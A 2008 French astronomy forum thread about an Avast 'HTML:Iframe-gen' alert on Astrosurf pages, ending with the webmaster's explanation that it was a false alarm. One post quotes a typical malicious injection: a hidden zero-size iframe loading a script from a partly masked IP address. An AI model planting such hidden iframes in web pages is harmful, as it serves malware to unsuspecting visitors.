Aller au contenu

Virus sur Astrosurf?

Astro_007

Messages recommandés

Posté

Mon logiciel antivirus Avast version 4.8 (080729-0, 29/07/2008),

détecte un virus dès que je veux afficher la page des forums Astrosurf, le rapport Avast:

Nom du fichier: http://www.astrosurf.com/cgi-ubb/Ultimate.cgi

Nom du logiciel malveillant: HTML:Iframe-gen

Type de logiciel malveillant: Virus/Ver

Version VPS: 080729-0, 29/07/2008

C'est Avast qui déconne ou c'est la même chose chez vous? :?:

Posté

Oui voici le virus :

f5146c3eb9aec1b2635c9228b3bd0.jpg

Le virus est sur toutes les pages du forums apparemment:(.

Enfin je préfère Webastro.

a+

Posté

Je viens de ré-afficher la page après vidage du cache de mon navigateur et là pas d'alerte Avast....

Je me suis renseigné vite fait sur le net, en fait si un (ou des) fichier est déposé dans un répertoire du site web, de type:

-funny.php

et/ou

-code.php

ils peuvent ensuite, à priori, modifier la page index.php en insérant une ligne :

<iframe src="http://124.217.252.XX/~admin/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Vrai danger ou pas? je suis perplexe

Posté

Fourmi,

Peut être peux tu nous expliquer ce qui provoque ton "hilarité" et nous donner un avis un peu plus pertinent?

Moi je cherche juste à comprendre.

Posté
Fourmi,

Peut être peux tu nous expliquer ce qui provoque ton "hilarité" et nous donner un avis un peu plus pertinent?

Moi je cherche juste à comprendre.

Je pense qu'il rigolait parce qu'il utilise l'un des OS concurrents de Windows, imperméables aux virus; et que donc ce genre de considération le fait sourire. Pas parce que AS serait peut être infecté, ne t'inquiète pas ;)

Posté

Epsi: c'est fait! Grelots à eu la même détection...

Créateur de bugs: ah ok! il utilise un OS en provenance de la banquise, je comprends mieux, pas d'inquiétude plus que ça de ma part ;)

Posté

Créateur de bugs: ah ok! il utilise un OS en provenance de la banquise, je comprends mieux, pas d'inquiétude plus que ça de ma part ;)

D'après le lien qu'il a mis sur son "huhuhu", je parierais plutôt sur un Mac. ^^

Posté

moi aussi avec antivir j'ai des alertes sur certaine pages, mais meme sur dailymotion cette "erreur" s'affiche. donc je pense qu'il y a pas trop a s'en faire.

et si tu fait deny acces sa affiche quant meme la page donc pas de soucis ;)

Posté

moi avec mon ordinateur je n'ai pas de souci avec astrosurf

Posté

A J moins ..... des jeux olympiques c'est une attaque en régle des chinois, à moins que des forums dissidents ... :p:p

Treve de plaisanterie mon antivirus " avast " m'a pratiquement oblige de fermer la fenêtre astrosurf !

Diantre le bougre il est trop habitué de webastro:wub:

Posté

Pendant ce temps, dans une salle obscure cachée au fin fond d'un bunker inviolable et inconnu enterré profondément en forêt amazonienne*...

"Vos petits changements ont marché à merveille mon cher A., l'opération est très bien partie.

_C'est toujours un plaisir que de faire affaire avec vous, cher C. Personne ne se doute de rien ?

_Absolument pas. Ils pensent tous que le site a été infecté. les premiers doutes étant là, il ne reste plus longtemps avant que ce concurrent gênant ne disparaisse définitivement de la toile...

_Je suis ravi de l'entendre, C. Avez vous d'autres cibles en vue ?

_bien évidemment ! Nous commencerons par tout site présentant un semblant de service concurrent, puis nous généraliserons la technique aux sites commerciaux. N'oubliez pas de frapper d'autres sites au hasard, pour que personne ne se doute de rien.

_ne vous inquiétez pas, nous avons d'autres clients très intéressés. Notamment un certain B.G. qui souhaite voir disaparaître une certaine pomme...

_Mon cher A., pourriez vous inverser ce contrat pour 1000 000 de plus ?

_Si vous le voulez. Vous avez de quoi ?

_Oh, si vous saviez combien les membres nous donnent, cher A., vous monteriez votre association immédiatemment.

_Je n'en doute pas ! N'oubliez pas de faire le virement comme convenu. Et nous ne sommes jamais vu.

_Evidemment. Qui êtes vous, d'ailleurs ?

_Je n'en sais rien. Bonsoir."

Et dans la sombre salle qui n'existait pas, deux personnes ne se quittèrent pas pour ne pas partir du bunker qui n'a jamais été construit en Amazonie. Pendant ce temps, aucun agent des RG inflitré dans la pièce d'à côté qui n'existe pas non plus ne se fit pointer un pistolet (qui n'existe pas) sur la tempe; aucun coup de feu ne fit tiré, et personne n'entendit quoique ce soit qui n'existe pas.

La suite dans les jours à venir... Sauf si elle n'existe pas.

*Sans défrichage, on est écolo quoi.

Posté
D'après le lien qu'il a mis sur son "huhuhu", je parierais plutôt sur un Mac. ^^

Euh! Depuis OS 10 il me semble que la pomme c'est de la banquise avec une interace de fruit...;)

Sinon c'est sur que se site recèle un dangereux virus, celui qui à une fâcheuse tendance à vider le compte en banque, à se les geler dehors les nuits de beau temps, à suivre les phases lunaires etc... Mais il ne s'attaque pas au PC mais bien à l'humain, le premier virus qui a franchi la barrière monde virtuel/réel :D:D:D

Posté
Euh! Depuis OS 10 il me semble que la pomme c'est de la banquise avec une interace de fruit...;)

hmm... Ca dépend à quel niveau. Si on veut être pointilleux, OSX marche sous Unix. C'est plutôt au niveau matériel que la pomme s'est rapprochée des autres.

• 2 semaines plus tard...
Posté

Revenons-en à cette alerte Avast, voici l'éclaircissement de Jean-Philippe Cazard, l'administrateur suprême d'astrosurf.

Bonjour,

Il s'agit d'une fausse alerte générée par AVAST, à cause d'un script PHP qui était inséré dans une "IFRAME". Cela ressemble pas mal à du code malfaisant .... mais cela n'en était pas.

Le script en question n'était pas indispensable, je l'ai donc supprimé et tout est rentré dans l'ordre.

Jean-Philippe Cazard

Webmaster Astrosurf

Vous voilà rassurés amis windoziens ;).

Archivé

Ce sujet est désormais archivé et ne peut plus recevoir de nouvelles réponses.

• En ligne récemment   0 membre est en ligne

• Aucun utilisateur enregistré regarde cette page.
  • Créer...

Information importante

Nous avons placé des cookies sur votre appareil pour aider à améliorer ce site. Vous pouvez choisir d’ajuster vos paramètres de cookie, sinon nous supposerons que vous êtes d’accord pour continuer.